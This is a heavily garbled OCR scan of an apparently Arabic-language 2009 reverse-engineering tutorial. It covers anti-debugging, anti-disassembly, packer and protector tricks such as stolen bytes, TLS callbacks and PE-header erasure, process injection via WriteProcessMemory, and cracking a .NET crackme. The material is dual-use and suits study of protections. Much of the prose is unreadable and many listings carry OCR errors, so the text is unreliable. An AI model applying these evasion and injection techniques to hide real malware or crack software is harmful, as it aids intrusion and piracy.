0044A280 XOR 
0044A29D MOV 
0044A2A2 ADD 
0044A2B0 NOT 


ETA AAN y 


EAX, 4713E635 
EAX, 4 
ESI,EAX 


ECX,1010272E 
ECX, 7A49B614 
EAX, ECX 

DWORD PTR DS: [ES1] 


ESI,EAX 


¿lío a LO yg a ¿piojo ab 0 Lo 


mov eax,ebx 
test eax,eax 


push  ebx 
pop  eax 
or  eax,eax 


a ay ul ao lll 


DWORD PTR DS: 
EBX, DWORD PTR 
EDI 

EBX, 7ECDAE21 
DAL SCS 


DWORD PTR DS: [ 


laredo e 


EAX, DWORD PTR SS: [EBP+3402713D] 


EE2] 


4 O A A 
fisco sillon mgeridl did rojos: 


ESI,DWORD PTR SS: [ESP] 
DWORD PTR DS: [ 
ESI,-4 
DWORD PTR DS: [ 
EAX, 4 


ESI],3CB3AA25 


ESI],33B568E3 


ESI] 


:¿+Permutation Code £* ¿pud2a¿ort daa ca yd god did 
A GUÓ JOE aia ¿una 00% E E JR duo ¿red 

¿or óyo 

JO ¿aa 


fria sigh jiáligaja: 


laredo e 
JO 690 Aj jo 


: Code Permutation-=7 3 code 


004018A3 MOV EBX,A104B3FA 
004018A8 MOV ECX,A104B412 


004018AD PUSH 004018C1 

004018B2  RETN 

00401883  SHR EDX, 5 

004018B6 ADD ESI,EDX 

00401888 JMP SHORT 004018BA 
004018BA XOR EDX,EDX 

0040188C” MOV EAX,DWORD PTR DS: [ES1] 
004018BE SIC 
0040188F JB SHORIO04O18DE 

004018C1 SUB ECX,EBX 

004018C3 MOV EDX, 9A01AB1F 

004018C8 MOV ESI,DWORD PTR FS: [ECX] 

004018CB LEA ECX,DWORD PTR DS: [EDX+FFFF7FF7] 
004018D1 MOV 


dd 


004018D6 TEST ECX,2B73 
004018DC  JMP SHORT 00401883 
004018DE MOV ESI,EAX 
00401880 MOV EAX,A35ABDE4 
004018E5 MOV ECX,FAD1203A 
004018EA MOV EBX, 51AD5EF2 
004018E DIV EBX 


004018F1 ADD BX,44A5 

004018F6 ADD ESI,EAX 

004018F8 MOVZX EDI,BYTE PTR DS: [ES1I] 
004018FB (OR EDI,EDI 


004018FD  JNZ SHORT00401906 


seg Alia coria ds dl obleas dog dls: 


00401081 MOV EAX,DWORD PTR FS: [18] 
00401087 MOV EAX,DWORD PTR DS: [EAX+30] 
0040108A MOVZX EAX,BYTE PTR DS: [EAX+2] 
0040108E TEST EAX,EAX 


00401090  JNZ SHORT 00401099 


s 


Ball jyacióo ls gora dl 4, 


q una PE Ed EN Qe EV API (o ñ AR e q z : sub pas 


es lb Más. 3 )VirtualAlloc/VirtualProtect/LoadLibrary/GetProcAddress) 


“o 


er ¿oro 95). breakpoints access/write gis) 5020 qe JO zó ¿uamóa, 


al ly 0d ao lll 2009 


lab lees ad loe gasz: ATARE 


laredo e 


E 


e cn Ent DA a E ño 
O aja ia Id. dar ¿o odo gas pa y Jamas 


¿Ga oyaz: aca ya *¿o-codegarbage ¿-permutation . 


conditional branchust sz ¿yaa y garbage hón) Anti-Disassembly -3¿ yaigdb yañisj da 
Yara 
¿la rro ajuste laz do a an U de 44 cla o yd queh ¿garbage 


zo, a o? e tas A E 
Oz garbage ¿4 adi ua 0 ria Fea O a 


.incorrectdisassembly hi o rl 3garbage 


GO sg abia yo 6413 ¿0 0 ¿0 check flag PEB.BeingDebugged ¿202350 


. anti-disassembly-9 092) e pó 


y 3 lla ja JA das As hs ¿e antidisassembly ás Ó0c Z jób ¿e 
Oxffbyte aho yer o ¿ado y yajump conditionalfake ¿2 bso yeruesicóuó 


¡Anti-disassembly sequence +1 


push .Jmp_ real 01 
ste 

ne .Jmp_ fake 01 
retn 

.]jmp fake 01: 

db Oxff 


F 


mov eax,dword [fs:0x18] 


¿Anti-disassembly sequence +2 


push .Jmp_real_02 

ete 

JE .Jmp_ fake 02 

retn 

.jmp fake 02: 

dh —  OXff 

.jmp_ real 02: 

mov eax,dword [eax+0x30] 
movzxX eax, byte [eax+0x02] 
test eax,eax 

jnz .debugger_found 


all ly 0 zado lll 2009 


ld logs aa Ives oagz: ATARE 


0040194A 
0040194rF 
00401950 
00401952 
00401953 
00401957 
00401959 
0040195C 
0040195rF 
00401960 
00401962 


0040 
0040 
0040 


0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 
0040 


040 
040 
040 
040 
040 
040 
040 
040 
040 
040 
040 
040 
040 
040 
040 
040 


O O 00011000 00C0o0oXoSo 


1963 
1969 
196A 


194A 
194F 
1950 
1952 
1953 
195 
1959 
195€ 
195 
1960 
1962 
1963 
1969 
196A 


194A 
194F 
1950 
TOS 
TOURS 
1933 
1953 
1953 
19393 
1993 
1953 
1953 
LOST 
1958 
1959 
195A 


6854194000 
f9 

7301 

eS 

ff6%al18 
0000 

006864 
194000 

f8 

VEO 

eS 
ff8b40300fb6 
40 
O2850CcOMS0NSl 


68 54194000 
9 

7 01 

(ES) 

FF64A1 18 
0000 

0068 64 

1940 00 

F8 

12 Qi 

ES 

FF8B 40300FB6 
40 

0233 0739071 


laredo e 


sa ¿as Cas o ¿la 3 lo 20 WinDhg : 


push 0x401954 
STE 
jnb image00400000+0x1953 (00401953) 
mel 
jmp dword ptr [ecx+0x18] 
add [eax],al 
add [eax+0x64],ch 
sbb [eax],eax 
le 
Jjb image00400000+0x1963 (00401963) 
mel 
dec dword ptr [ebx+0xb60f3040] 
inc eax 
add al, (Sa 520) 
+ 3 
pidas a els Js 22 OD : 
PUSH 00401954 
SE 
JNB SHORT 00401953 
RETN 
JMP DWORD PTR DS: [ECX+18] 
¡ADD E JAR DS laa T] 21 
ADD BYTE PTR DS: [EAX+64] ,CH 
SBB DWORD PTR DS: [EAX],EAX 
CLc 
JB 
RETN 
DEC DWORD PTR DS: [EBX+B60EF3040] 
INC EAX 
¡ADJD) ¿Mb 3 da IM Ss Mallas a0) 7/7 5101011 


Hámeyo 
push (offset loc 401953+1) 
stc 
3jnb short loc 401953 
retn 
loc_ 401953: ; CODE XREF: sub_401946+A 
; DATA XREF: sub_401946+4 
jmp dword ptr [ecx+18h] 


sub_401946 endp 


db 
db 
db 
db 


A INS 


Cea jo ads ¿e IDAPrO : 


lab lus ad loe gasz: ATARE lodcloedors e 


0040195B dd offset unk 401964 
0040195F db 0F8h ; ? 

00401960 db 72h; r 

00401961 db 1 

00401962 db 0C3h ; + 

00401963 db 0OFEh 

00401964 unk 401964 db 8Bh ; 1 ; DATA XREF: text:0040195B 
00401965 do 40h; a 

00401966 do 30h ; 0 

00401967 do 0Fh 

00401968 db 0B6h ; 

00401969 do 40h; 0 

0040196A db 2 

0040196B db 85h;a 

0040196C db 0COh ; + 
0040196D db 75h; u 


3 
¿A 


SUN cl dla as cala pd a ds ga Jasa ab al 


tordo, rd rbóscuaraanti-disassembly ga 
150 O he ds pajas dano y macro ed Sé raya itsiga ¿o-anti- 
¿uy disassembly 


o 1 gr da 


Da Y ZAS ua ya ¿yaya yq 309009 Armadillo 


SSI ET OT 
A ¿es Ae $ Loa ñ CE y? 
¿dije dé La JE sata z Aid y osa 5 Q 


e Js iaa Sai bee 


explorer.exe mega 


7 E ”. q es 7 2 A A ia : . + 
ae roxg JO PES air, q jaa de y Ea 6 ¿jad A 
: iexplorer.exe 3 


= Me OLLYDBG.EXE 1 DllyDbg, 32-bit a... 
= Y) notepadie.exe 1 


A IS 2009 


lab lus ad loe gasz: ATARE lodrlue dose 


O ea epa Lys JONES ja 


NTPacker by ErazerZ [oa] 
31 st August 2005 


Erazer ZiGbgmail.com 


Choose your crypting method: 

() aPlib - Compress and crypt your server 
(O XOR - Crypt your server with random Key 
O aPLib and XOR - Compress and crypt 
Inject into other Process (Default None) 


| brogramfiles%MSN Messengerinsnmsgr ext | 


jes ia O Ly ¿A e Y tal ¿yaa sal ¿ha ya ela Loc ¿jay 
ES Y) Ú 


IN Ud 


ag yet es at ls Us 
tri se 4%, 


e 


a Os q po e A O A ES 
A bt EY OO do JA L 80 (CRESstye SS 
do 


OS 4 Eh 2 Z d o h ne : bg e po 
pee bz $ gr $ O 3 entry point pa 4 ya 20 child process ¿E bo 
ya de 


4 ek 0 
eg 9 kiÓga Oy 
aaa vaselfto jump ¿2d oil ás llo 5h process parent 

SAS geo A Liso 9 dump ej A ¿aro 


WriteProcessMemory 37% ¿blyuyaso deje cis 2 Li jar process child «lg? y 


O 


288 2/3 090 dado lbs 2009 


lab lua ad loe gasz: ATARE 


68 
68 
éA 
€A 
6A 
6A 
éA 
€A 
6A 
68 
E8 
€A 
68 
68 


D4344000 
90344000 


00304000 
96000000 
po 

BF010000 
B1324000 


FF35 4A304000 
FF35 D4344000 


E8 


97000000 


FF35 D8344000 


E8 


eo000000 


gua ye Ed 


| PUSH 


PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 


PUSH 
PUSH 
PUSH 
PUSH 
PUSH 


PUSH 


£ 


z 
0 JE 


Md ts 


14] 
0 
4 
0 
14] 


0 
18F 


DWORD PTR DS: [40304A] 
DWORD PTR DS: [4034D4] 


DWORD PTR DS: [4034D8] 


5 


Jl PUPE 2002 Suite (Parcheador 


pupe_original. exe 
svchost.exe 
cappro32.exe 
ronar22 keygenme.exe 
ollydbg.exe 
mipmp.exe 
wmplayer.exe 
wdtspeak.exe 
agtserv.exe 
elingo.exe 
foxitr”1.exe 
audiodg.exe 
winword.exe 
iemonitor.exe 


AN Maa 9 ar E age % Gya ce process child 


pProcessInto 
pStartuplnfo 
CurrentDir = NULL 

pEnvironment = NULL 


= Ronar22_.0 
= Ronar22_.0 


lirlucdorsz 


D4034D4 
0403490 


CreationFlags = CREATE SUSPENDED 


InheritHandles = FALSE 

pThreadSecurity = NULL 

pProcessSecurity = NULL 
CommandLine = NULL 


ModuleFileName = "Ronar22 Keygenme.exe"” 


CreateProcessA 
pBytesWritten = NULL 


BytesToWrite = 1BF (447.) 


Buffer = Ronar22_.004032B1 


Address = 401000 
hProcess = NULL 
MriveProcessMemory 
hThread = NULL 
ResumeThread 


*í. The PUPE'S Team 


DODODES5O 
DOO0OC30 
00000408 
00000144 
DODODICS 
0000958 
DODOOBDE 
DODODFFC 
00000944 
DODOD83C 
00000014 
DODO0F80 
DODODEFO 
0000988 


Select a process and press the right mouse button 


ae gy Jo ds ¿aja e Armadillo ¿572 gs) is y attaching 


eb de, 
Log raiz póprocess parent * 


dy iaa, ¿e 


A LIN 


d 


00000000 
00000000 
0000000 
DOD00000 
00000000 
00000000 
00000000 
DODODOD0 
00000000 
00000000 
00000000 
DO000000 
00000000 
00000000 


00000001 
00000007 
00000005 
00000001 
00000002 
00000009 
00000014 
00000003 
00000001 
00000006 
00000005 
00000008 
D0000008 
00000003 


yapa rad ia functions debugging . 


6 je pa 503 3 4 process child ¿bc?g arroz 


: debugs/controls-<¿ ar óddlo ae 1 ó parentprocess 


lab lees ad loe gasz: ATARE 


Md ester 


a 


E Y explorer.exe 


1680 11 Windows Explorer Microsoft Corpo 
FJ VMwarelser. exe 1768 2 VMwarellser VMware, Inc. 
Q prOCcexp. exe 2 606 Sysintemals Pro... Sysintemals 
1 
Ea 


OllyDbg. 32-bit a... 


ESEV ¿process child ¿diia dela á 33) 3% ya uo Attache0gás y pro có A JA) sd 


áboa native (2 e a Jo 30 kernel32 ¿2 que aia 
0 hh 


DebugActiveProcess 33» 
QA) Va 


a STATUS PORT_ALREADY_SET yadá, NtDebugActiveProcess 


ds Ela jodo yagele y yedas ts e as ¿ha DebugactiveProcessStop += ¿+ context ¿li jas 
process parent ¿70 ¿Hua dls mioyer oral process child ¿GA jeans a hAttaches 
2 3 óV, 
5 WaitForDebugEvent yeztGé 2 liberó», y ua 


parent process ¿2022 ja só Attach 
Ay pao died Hi 33 )DebugActiveProcessStop(ChildProcessPIDyepzGe ¿05% ás 
a 


. child process yeípla? ¿0 Attach 


actual entry ig dió ive ruca lore a Jal pujas too o al 


¿uz y Data Directory entries-2¿ veóy 0h SJ PE Editor- e (só jueds 3 TLS callbacks-=¿ E ze5 


.TlS directory óist2s 2, ÓósEz 


a ay ul ao lll 


lab lus ad loe gasz: ATARE lodrloedors e 


Size 


Export Table 00000000 00000000 
Import Table Í- OD1ESODO 00000110 
f 000F1000 00019600 


00000000 00000000 


0000000 ” ODODO000 


LoadConfig 00000000 
joundimport 00000000 00000000 


LAT 00000000 00000000 


Delavlmport 00000000 


depa 9022 RVAETLS 15 001E9110 302318 


só gós daa 0 ve dis ¿e directory TLS : 


TLS directory: 
StartAddressOfRawData: 00000000 
EndAddressOfRawData: 00000000 
AddressOfIndex: 004610F8 
AddressOfCallBacks:  004610FC 
SizeOfZeroFill: 00000000 
Characteristics: 00000000 


sb za Luo *a a Oe OllyDhg ás 


e jad as ¿e DEP jalo Ar y da ao a lo 9 
ELO E da a OEP a OllyDbghób blog já do 


de a ad ; 
00LG dy bres Edd TLS X 


:TlS callbacks-2¿ 9Ólb as Ó 3 actual loader=2 Ó1 lágrón 


ai ls Uca lps 2009 288 


lab lus ad loe gasz: ATARE lodcluedors e 


ES Debueging options PX 


Commands | Disasm | CPU | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug Events | Exceptions | Trace | SFX | Strings | Addresses | 


Make frst pause at 
6 System breakpoiné 
€ Entry point of main module 
E WinMain [if location is know) 


¿OO gEpina y, ¿ya Ser ue ¿e ntdlldl — actualloader-2¿ 2» OllyDbg lsró Ló mo ja 


sd ¿uroutines callback ptaliérerys ee ¡od 


300 go aL* CORA dise guia bal ya PE el Joe Ú 
abla: 


An In-Depth Look into the Win32 Portable Executable File Format, Part 2 by Matt Pietrek 


[dy ue 
cio aid 


dgóm: álby ias dsd, sde quo 


004011CB MOV EAX,DWORD PTR FS: [0] 
004011D1 PUSH EBP 

004011D2 MOV EBP,ESP 

004011D4 PUSH -1 

004011D6 PUSH 0047401C 

004011DB PUSH 0040109A 

004011E0 PUSH EAX 

004011E1 MOV DWORD PTR FS: [0],ESP 
004011£E8 SUB ESP,10 

004011EB PUSH EBX 

004011EC PUSH ESI 

004011ED PUSH EDI 


28 23 00 dado lbs 2009 


ld logs ai Ives oagz: ATARE 


laredo e 


¿birds didas cto GEO F Protector Enigma Hue 90h 2 gs: 


004011CB POP EBX 
004011CC  CMP EBX,EBX 
004011CE DEC ESP 
004011CF POP ES 
004011D0 JECXZ SHORT 00401169 
004011D2 MOV EBP,ESP 
004011D4 PUSH -1 
004011D6 PUSH 0047401C 
004011DB PUSH 0040109A 
004011E PUSH EAX 
004011E MOV DWORD PTR FS: [0], ESP 
004011E8 SUB ESP,10 
004011E PUSH EBX 
004011E PUSH ESI 
004011ED PUSH EDI 

El $ Ay Y 
stolen ¿2 2 jaáysa JUMP ¿Y 4 JS 

ya 
“eds garbage code *»5)st 

004011CB  JMP 00870361 
004011D0  JNO SHORT 00401198 
004011D3 INC. EBX 
004011D4 ADC AL,0B3 
00401106 JL SHORT 00401196 
004011D8 INT 
004011D9 LAHF 
004011DA  PUSHEFD 
004011DB MOV EBX,1D0F0294 
004011E0 PUSH ES 
004011E1 MOV EBX,A732F973 
Odds (ADS dada IR SS ana Cial 
004011E9 MOV ECX,EBP 
004011EB DAS 
004011EC DAA 
004011ED AND DWORD PTR DS: [EBX+58BA76D7],] 


arnold gd 


s ul dy ¿dedo mija ah ZoolfAnder + 
0 de Jive % 


E 5d | ca de NT 


a ay ul dao lll 


log 2 DEP rs 00 


ro J 
CO Y y 


ASProtect ¿2 ju a ps a 


olen instructions-¿2 veña)j ¿có da at y instructions 


ECX 


, 


0 ya lc gd Aa da o 
desliga a qa Joa org Co 


OllyDbg ¿eó Plugin e »li ja jus 


: IDAFicator 


2009 


log le ome loas ago: ATARE 073 ud) té de ¿ lcd z 


5 


MSVC— 6.0 - (With MSVCRT module - No GatVersion) 
MSVC= 5.0 - () 

Borland C— 1999 - (From bezinninz - Real API) 
Borland C— 1999 - (From bezinninzg - with fb:C—HOOK) 
Noper pattern - (just a 'noper pattern) 


A OS 


8BECc MOV EBP,ESP 

6A FF PUSH -1 

68 DEADCODE PUSH DECOADDE 

68 DEADCODE PUSH DECOADDE SE handler installation 
64:41 00000000 MOV EAX, DWORD PTR FS-:[0] 

50 PUSH EAX 

64:8925 00000000 MOV DWORD PTR FS- [0], ESP 

B83Ec 58 SUB ESP,58 

53 PUSH EBX 

56 PUSH ESI 

57 PUSH EDI 

8965 E8 MOV DWORD PTR SS: (EBP-18] ESP 


rebuilding the 


eg 


00404F05 LEA 


y ¿ja La 3 4 SAD Aa A ja ¡ES Ús ya ay 5 33 ó A q S - 


00404F0B PUSH 
00404F0C PUSH 
00404F12 CALL 


004056B8 
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; A e .. estr ale , ] ] 
a y Ey e ja Jo 1 a ti o o dla ju pta jaa 


E 


. import table 


es Mo 
Sul $0 


Co $ as y) Al ¿Jóca Di $ yw des ade ¿ndruyailjo d ya, 


z 


cd llas ¿oe CopyFilea : 


EDI,DWORD PTR SS: [EBP-20C] 


EDI 
DWORD PTR SS: [EBP-210] 
<JMP . £¿KERNEL32.CopyFileA> 


dl ty ¿degues ¿Tablelmport:: 


q A e 
E 


JMP DWORD PTR DS: [<£KERNEL32.CopyFileA>] 


lab lees ad loe gasz: ATARE JA ud) ú yude de 6 loved 


O A IA E la NS dia? 7 h E 
allocated “ed 3 ¿qápio co jar le e a Ús 46 53M 2200 Asprotect 


a 


: kernel32CopyFileA- 2193007 ua tb, Ósed há o 3memory 


004056B8 CALL 00D90000 


proa at ss dad jj o gy dá alos 
7 á 
kernellCopyFileA ¿ac 33% JAd ras ás se sado 7083005 y" 


y dia ja Payo by ie AM 
y 


z E bea á nh 
GOLEO a oO 


:RETNt00x7C830063 3%», CopyFileAvez¿ Ge ls ódicca jkernel32.dllasé venta 


Stolen instructions from kemel 32!Copy FileA 


00D80003 MOV EDI,EDI 
00D80005 PUSH EBP 
00D80006 MOV EBP,ESP 
00D80008 PUSH ECX 
00D80009 PUSH ECX 
D0D8000A PUSH ESI 
00D8000B PUSH DWORD PTR SS:[EBP+8] 
00D8000E JMP SHORT 00D80013 
00D80011 INT 20 

00D80013 PUSH 7C830063 ¡return ElP 
00D80018 MOV EDI,EDI 
00D8001A4 PUSH EBP 
00D8001B MOV EBP.ESP 
00D8001D PUSH ECX 
00D8001E PUSH ECX 
00D8001F PUSH ESI 
00D80020 MOV EAX.DWORD PTR FS[18] 
00D80026 PUSH DWORD PTR SS:[EBP+8] 
00D80029 LEA ESI.DWORD PTR DS[EAX+BF8] 
00D8002F LEA EAX,DWORD PTR SS:[EBP-8] 
00D80032 PUSH EAX 

00D80033 PUSH 7C80E2BF 


Actual kemel32 !|CopyFileA code 


7C830053 MOV EDI,EDI 

7C830055 PUSH EBP 

7C830056 MOV EBP,ESP 

7C830058 PUSH ECX 

7C830059 PUSH ECX 

7C83005A PUSH ESI 

7C83005B PUSH DWORD PTR SS:[EBP+8] 
7C8300%3E CALL kernel32.7C80E 244 
7C830063 MOV ESI,EAX 

7C830065 TEST ESI,ESI 

7C830067 JE SHORT kernel32.7C8300A6 


; OJO Esso 9% 


74 * e 
E 


ds? tadRedirecting peo piaja ¿oa Jaro aa 19 gz da q ya 


9222 Table Import gó3 jo roza UIr: 


Y dá pubs e Mlgsjan de 
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lab lus ad loe gasz: ATARE lodcloe dose 
IB Universal Import Fixer v1.2 (FINAL) COS 
Universal Import Fixer v1.2 (FINAL) by : Magi c_h2001 a ; 
magic_h2001eyahoo. com Process | D: 
http: //magic.shabgard.org 0 Y] Hex 
Date : 2005.02.23 de 
Update: 2008.06.15 Code Start : 
0 Hex 
Code End: 
0 Hex 
NewlAT WA: 
0 J| Hex 
[1 Fis Directly Imports 
[] Fast Speed 
| Always OnTop 


¿boya Jj ya dis ¿ui jas ¿ 


A A 
A Bd 
Macaya 


2 1 o datos PECIypt dad Ugo aba S00O soya ¿iy jlubya ály yo des 2 a ZE Pa 


: fetched bythe main thread ya 


PECrypt operates and synchronizes its threads as follows: 


ej Thread 2 . Thread! 
na Decrypt Data qna Store Data 


Thread 1 
Fetch Data 


39) 


Anti ¿2 3% anti-debugging==¿ 3 iy ¿uóra  ds 
dajómó Cua dez 390 54d q ie ez y) já zado y 12 0As, 
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laredo e 


Protected Executable 


Virtual 
Machine 


instructions 


ús Execrypt StarForce  Oreans technologies CodeVirtualizer 45 245 yalaz? dq3ó ) ¿eos 


3 3 . Virtual Machines-27 


Hlelagós o dial 
virtual ¿jg2 090 3h gaya ¿a dos comas ¡dao 


Defeating HyperUnpackMe2 With an IDA 


ed A e ¿bb 4 . ' ; go. 
iaa roda abstue ra machinevirtual ¿ass 
ra AT ; 


DN E NN 


all ly 0 ao lll 2009 


lab lus ad loe gasz: ATARE JA ud) ú yde de 6 led 


lu cs Ag 7) 2 Ens A Le y a AN al: beca és a HE A TA ¿ado Go pus) de adas, EU! 


Bytes 5 3%: Oy ras 


adria y tas instructionsbranch go 345 ¿0Ue 
¿oa 1 oe bl sé 


o ya ata sf ¿yaya jump the of size dG destination ofthe jump Úd+Úeó de 93 OE 


¿QalozgNanomites 30 raso ¿cv 


JN ¿erdl3 INT as JV ¿gas W gato ¿eya 30 JW lia 


INT dó2 jO eds rula jad rad lá y alg ¿rd e ceo iia 7 


có lJlule PE le Ecij 
£xy 


dicho [e ll SizeOflmage *. 
Eat lag licia cui US ito AG 


mov eax, fs:[0x30] ¡¿PEB 

mov eax, leax + 0x0c] ¡PEB_LDR DATA 

mov eax, [eax + 0x0c] ¡¿InO0rderModuleList 

mov dword ptr [eax + 0x20], NewSize ¡;SizeOfImage 
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Y jad jad 90 yO Y jue PE 3 Y ¿2 Header Executable Portable ¿coló card rs 


aba aia ya Gr VA ÓN q ¿ec? pá ¿Export Import, Reloc, 3 


Ll DE ts 125 Dump ES Ely q ESA EQÓ des yeso Pago entry point-Z 
Eye eat A A £ $ 
A ¿20 YY a] GOO Ea? e HeaderPE: 


// This function will erase the current images 

// PE header from memory preventing a successful image 
// if dumped 
inline void ErasePEHeaderFromMemory () 


1 


DWORD OldProtect = 0; 

// Get base address of module 

char *pBaseAddr = (char*)GetModuleHandle (NULL) ; 

// Change memory protection 

VirtualProtect (pBaseAddr, 41096, // Assume x86 page size 
PAGE _READWRITE, £OldProtect); 

// Erase the header 

ZeroMemory (pBaseAddr, 4096); 


1) An Anti-Reverse Engineering Guide (By Josh_Jackson) 


2) The Art of Unpacking by Mark Vincent Yason 


3) Peter Ferrie collection: 
Anti-Unpacker Tricks 2 Part Six Anti- 
Unpacker Tricks 2 Part Five Anti-Unpacker 
Tricks 2 Part Four Anti-Unpacker Tricks 2 
Part Three Anti-Unpacker Tricks 2 Part Two 
Anti-Unpacker Tricks 2 Part One 


4)  Reversing: Secrets of Reverse Engineering. E.Eilam. Wiley, 2005 


5) OpenRCE Anti Reverse Engineering Techniques Database 


6)  http://www.datasecurity-event.com/uploads/unpackers.pdf 
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Reflector 


Deblector  * 


DotNet EXPERT 2.exe 
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lg E As aa loe ago: ATARE ya EN RA TIA 


Introduction to .net applications 2% Só gl aiSéab de tó | 
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E A A EN A A E $ zo Puya ¿aci 
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1 da pálaca eli 5300 shCompiler Sa yalanguage Intermediate Fógdas 
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200), Le saya ¿plo ye Runtime Language Common 
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Just In Time Compile ini AN cr E Ca yy gol re des 
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Cuz Reflexil y aja JR ua 00 
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pa) A Med ¿ón AL ya qa Cog hn € as, 


elle peo ela pijas 


Reflection.Emil 
PowerShell 


A IAE E ga o 
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Bego ig tio caigo). 


Disassembler 


L_0006: stloc. 1 
L_0007: ldstr ” 
L_000c: stloc.0 
L_000d: Idarg.0 
L_000e: ldfid dass [System.Windows.Forms]System.Windows.Forms.TextBox DotNet_EXPERT 
L_0013: callvirt instance string [System.Windows.Forms]System. Windows.Forms.TextBox::get 


L_0018: stloc. 1 

L_0019: Idloc. 1 

L_001a: callvirt instance int32 [mscorlib]System.String::get_LengthQ 
L_001f: Idc.i4.s 16 


L_0023: Idid'ble,s (00031): Transfers control to a target instruction 
L_0024: dl íshort Form) if the first value is less than or equal to the 
second value, 


L_0027: call st mas: :Mid(string, int32, int32) 
L_002c: call string 
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Show PDB symbols 

Browser 

Appearance IS: pa 

Proxy Server nds n y] 
Optimization: — |.NETZ.0 [v] 
Documentation: ¡Formatted [| 


Number Format: 


Auto 


Decimal 


és EGIÓ: o ¿op m7 
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lid log is rd les ago: ATARE yá ga lie dot 


a  gatdra je sel Visibility + 5 Only Items Public: 


Disassembler | Automatically resolve assemblies 
Bose 
Appearance | O Flatten namespaces 


Proxy Server 
il [1] Show inherited members 


[7] side-by-side versioning 


Visibility: — | All Items el 


a 4% MM <— 
El 4) Base Types 
E % RHA Qu Derived Types 
E 4) Base Types Y .ctorú) 
(4 Derived Types > Dispose(Boolean) : Void 
Y .ctor() 2% Getvalue(String) : String 
> Dispose(Boolean) : Void —<+ ¿o InitializeComponent() ; Void 
2% Getvalue(String) : String 2) SetstríInt32) : String 
2%) SetstríInt32) : String —Y ye components ; IContainer 


id boy dog Esos apli 


Sy poda Jas Reflector : 


- Cuelga ds dues Se ¿ajo 399 0ya Ge gar jala EE é 


: Analyze gar da AS 


28 ly 080 dado lb 2009 


3 DotNet EXPERT 2 
E Mi DotWNet EXPERT 2.exe 
E aj References 
a O - 
E () DotMet_EXPERT_2 
a % MainForm O Back Alt+Left 
HE 1) Base Types 
E (4 Derived Types 
=44 ,ctor() 
> BTRClick(Obje 
¿$ DisposeíBoole ;- 
¿o TnitializeComp Ne Copy EU 
=4 Label2Click(Ot 
¿9 ETR : Button 
¿9 components : 
39 label? : Label Search MSDN —— CtrleM 
30 label3 : Label 
3? pictureBoxl: — GoToField Iype Ctrl+T 


O Forward Alt+Right 


53 Togale Bookmark  Ctri+K 


[Ka] Disassemble 


E () DotWNet_EXPERT_2.My 


Festo: Analyzer go sai o a sdo, ¿ro (+) Cairo 


(e + ¿aná BTROLICK ácada y 


dE Used By (vee 
5 y) Popup Menu (vas ya Go To Member 


E = O 
EF: ¿o DotNet_EXPERT_2.MainForm.InitializeComponentí) : Y ya Copy Curie 


HH (4 Assigned By X. Remove Del 


Go To Member 


Dim str As String =*" 


> Dispose(Boolean) : Yoid If (([text].Length > 8H10) AndAlso (RHA.GetValue(Strings.Mid([text], 
¿o InitializeComponentí) : Yoid str = RHA.GetValue(Strings.Mid([text], 10, 8)) 

4 Label2Click(Object, Eventárgs) : Void If (str = "4157”) Then 

Q ETR : RHA,Setstr(Conversions.ToInteger(str)) 
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Edit Rule Set 


Browse Silverlight Page  Ctri+U 


ceda saab Mas dstazás az Reflector ádineyaDebugia del bagre alió: 


EA yA 


p»ponssc 


IL view | Disassembly 
method public instance void BTRClickCobject sender, class [msca 


.maxstack 3 

«locals init (€ 
string str, 
string str2) 


class [system. windows. Forms ]system. windows. Fc 
calluirr instance strina sawstem iwindnws Enrms 1:51 


Auto | Calls | Modules | Quick View 


re[ sume] Resumes suspended thread 
, am under the debugger 
wariable to a ne alue 
an ip into new pos in the current function 
sources around the current location 


Into 


1] 
TU 
rt 


read from runni ng 
fs path or Reloads/Lists symbols 


Command 
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Jrs cas Ja 


A INS 


lil leg As oda los ag: ATARE yá ga lie dot 


¿ls aj dpto e dl yá ¿a 


¡¿albrdo ga oda dl a 


de iucayo sestoXg[FI1.] ) Step Into :¿Ípo e aldo irás E 


: ¿by malos 34225 (Out Step ) JS ¿ea 
dador có (OverStep) JJrzueavs se se óxis [FLO El 


áblsga (aldo ió) ea ¿da Artach ) ás lili állyy gus jad [a] 


Ó d Loy Ed So Ai Lopdl A ZA oval! q 


os 


¿Bosa yo) lali IL 3 90 [E Le] 


: | Ayala ga 39 Ugo yr, yal cad a] alib 


E bayas Jae re ll só og od) L 0001 ...L_0000 : Ge ¿00 jas GUY ya, 
A Edo y 4 liz 0 000 


Aló ea ode erro score (bne) dore cto 0077: 


L_003e: ldc.14.0 


LA : oc. 
L_0042: ldc.14.s 10 
L_0044: Tdc.14.8 
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alla da ja elo y Vial. 


abogó pe poo is do Boo pista CAS só ¿lala 2 je 


Ep dusba Y daRegister: — BTRCLICK 2 AUpcagalles 
Disassembler 


Public Sub BTRClick(ByVal sender As Object, ByVal e As EventAros) 
Dim text As String = ”* 
Dim str As String = ”" 


[text] =Me,Ts.Text 
IF AndAlso (RHA.Getvalue(Strings.Mid([text], 1, 9)) = "112244617383124392")) Then 
str = RHA.GetValue ) 


If (str =*4157”) Then 
Me.Ts.Text = RHA.SetStr(Conversions.Tolnteger(str)) 
End If 
End If 
End Sub 


gis ¿gradas ¿sd 3bó) 343078, String 03 der : Text Jubs 
16>Text.Length 
¡Er óbore 9 93 1: Mid(text, 1, 9) 
8) 10,text, Mid( 
Nue Function ¿444 el y jiyo RHA GetValue : RHA.GetValue 


¡ng aye 00 ya o) dygo Ts Ts.text 
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dsg 39 Eo oda lay 
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op lo a ga y A Roi ya, 
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gang roagrida(4157) pa Ja puja Zoco eva GetValue 


GO deja ls Oya dez ag ae sue 90 y, TS Coi e easelstr. 


Dim str9 As String = “abcdefohijkimnop VW JKLMNOPQRSTUVWXYZ-1234567890123456789* 
Dim str4 As String = 


Dim str5 As St 


, sttE qual Parameter) 5300 Angatia sl áyo String ¿0 


FStrin ¿ácaro tdo tol iio Ós EE ERrocór sn > GetValue=..... 
Public Shared Function GetVal Val StrIn As String) As Stri 
DimiStr9 As String = 
Dim As String = 


Dim As String = 
Dim As String = 
Dim As String = 
Dim str8 As String = 
Dim str2 As String = 
Dim str3 As String = 
Dim start As Integer = 1 
Dim num As Integer = 0 
Do 
If ((num Mod 4) = 0) Then 
= (str4 8 Conversions. ToString(str3;Chars(num))) 
Elself ((num Mod 4) = 1) Then 
